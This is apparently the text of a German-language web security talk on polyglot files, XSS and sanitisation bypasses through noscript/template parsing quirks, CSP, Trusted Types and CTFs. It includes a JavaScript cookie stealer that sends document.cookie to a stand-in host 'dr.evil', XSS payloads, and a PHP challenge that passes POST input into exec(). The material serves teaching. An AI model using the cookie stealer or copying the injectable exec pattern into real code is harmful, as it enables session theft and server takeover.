ctw
capture the web

@maxammann

11. Juni, 2019

Lets talk about files

wget "https://www.alchemistowl.org/pocorgtfo/pocorgtfo03.pdf"
firefox "pocorgtfo03.pdf"

Quelle: PoC||GTFO 0x03

cp "pocorgtfo03.pdf" "pocorgtfo03.jpg"
firefox "pocorgtfo03.jpg"

unzip "pocorgtfo03.pdf" -d "unzipped/"

  Archive:  pocorgtfo03.pdf
  warning [pocorgtfo03.pdf]: 12224072 extra bytes at
  beginning or within zipfile (attempting to process anyway)
...
  inflating: unzipped/pocorgtfo02.pdf
  inflating: unzipped/pocorgtfo03-encrypt.py
...

aes = AES.new(...)
output = aes.encrypt(read('pocorgtfo03.pdf'))

python2 "unzipped/pocorgtfo03-encrypt.py"

aplay -r 22050 -f S16_LE "pocorgtfo03.pdf"

Vulnerabilites

Eine Lücke oder Schwäche im Design oder der Implementation eines Systems, welche ausgenutzt werden kann um die Sicherheitsrichtlinie des Systems zu verletzen.

Quelle: IETF RFC 4949

Exploit

Ein Exploit nutzt eine Vulnerability um eine bestimmte unerwartete Aktion auszuführen.

Vulnerability muss “exploitable” sein
Exploits nutzen einen Payload um gewünschte Aktionen auszuführen

Payload

var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "https://dr.evil/sink", true);
xmlhttp.send(JSON.stringify({
  hostname: window.location.host, 
  session: document.cookie
}));

Beispiel einer XSS

Vulterability: XSS
Payload: z.B. unser Cookie Stealer oder hier alert("XSS")

Quelle: XSS on Google Search - Sanitizing HTML in The Client? von liveoverflow.com

<div><script title="</div>">

<script><div title="</script>">

Aktuelle HTML-Parser sind zu komplex und zu unterschiedlich.

▶ Serverseitige Sanitisation ist nicht ausreichend!

XSS Sanitisation mit `<template>`

template = document.createElement("template")
template.innerHTML = '<img src=x onerror=alert("XSS")>'

// Sanitize DOM structure
template.content.children[0].removeAttribute("onerror")

div = document.createElement("div")
div.innerHTML = template.innerHTML

template = document.createElement("template")
template.innerHTML = '<noscript><p title="</noscript>' +
    '<img src=x onerror=alert("XSS")>">'

div = document.createElement("div")
div.innerHTML = template.innerHTML

div = document.createElement("div")
div.innerHTML = '<noscript><p title="</noscript>' +
    '<img src=x onerror=alert("XSS")>">'

<noscript><p title="</noscript><img src=x onerror=alert("XSS")>">

DOM Tree für <template> DOM Tree für <div>

Der DOM Tree ist je nach Kontext unterschiedlich, obwohl der ursprüngliche HTML-Code der gleiche ist!

Was passiert hier?

The noscript element represents nothing if scripting is enabled, and represents its children if scripting is disabled.

Da in einem <template> tag scripting deaktiviert ist, werden unterschiedliche DOM Trees gebaut.

Quelle: https://www.w3.org/TR/html52/semantics-scripting.html#the-noscript-element

Severity: Very High

Vulnerability bestand in der Google Suche für 4 Monate!

(git commit)

Google Vulnerability Reward Program payouts in 2018

Quelle: Google I/O 2019: Securing Web Apps with Modern Platform Features

`Content-Security-Policy` to the rescue

CSP is a strong defense-in-depth mechanism against XSS.

Quelle: https://www.w3.org/TR/CSP3/

Content-Security-Policy:  default-src 'self'; 
                          img-src *; 
                          script-src scripts.example.com

Verbietet inlinen von JavaScript und lässt nur bestimmte Quellen zu.

<img src=x onerror=alert("XSS")>  // Inlined
<script>alert("XSS")</script>     // Not inlined

Content-Security-Policy:  script-src 'nonce-r4nd0m'; 
                          img-src *;

<img src=x onerror=alert("XSS")>
<script>alert("XSS")</script>

<script nonce="nonce-r4nd0m">alert("XSS")</script>
<script nonce="nonce-r4nd0m" 
        src="https://cdn/lib.js"></script>

Draft Preview: Trusted Types

Wie sieht eine typische XSS aus?

// e.g. foo = <script>alert("XSS")</script>
const foo = location.hash.slice(1) 
const element = document.querySelector('#foo')
element.innerHTML = foo

element.innerHTML = foo

element.innerHTML = Policy.createHTML(foo)

Idee: String → TrustedHTML

CSP Richtlinie setzten

Content-Security-Policy: trusted-types myPolicy

Sanitizer angeben

const Policy = TrustedTypes.createPolicy('myPolicy', {
     createHTML(s: string) => myCustomSanitizer(s)
}, false)

HTML sanitizen

element.innerHTML = Policy.createHTML(foo)

Was sind CTFs?

Capture the Flags sind Puzzle
Mit dem finden eines Exploits kann man die Flagge erobern
Anfänger: Ausnutzen eines Buffer-Overflow
Profi: Finden iner Zero-Day in Safari 🤯
Trainiert Frusttoleranz

Grab a beer and ctf!

<?php
if (empty($_POST['hmac']) || empty($_POST['host'])) {
    header('HTTP/1.0 400 Bad Request'); exit;
}
$secret = getenv("SECRET"); 
if (isset($_POST['nonce']))
    $secret = hash_hmac('sha256', $_POST['nonce'], $secret);
$hmac = hash_hmac('sha256', $_POST['host'], $secret);
if ($hmac !== $_POST['hmac']) {
    header('HTTP/1.0 403 Forbidden'); exit;
}
echo exec("host ".$_POST['host']);
?>

Quelle: www.securify.nl/en/blog/SFY20180101/spot-the-bug-challenge-2018-warm-up.html

_{maxammann.org/contact github.com/maxammann}

digitalfabrik

ReactDOM.render(
  <a href="javascript: alert(1)">Click me!</a>,
 document.getElementById('container')
)

$hmac = hash_hmac('sha256', Array(), "SecretKey");

XSS Vektoren: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet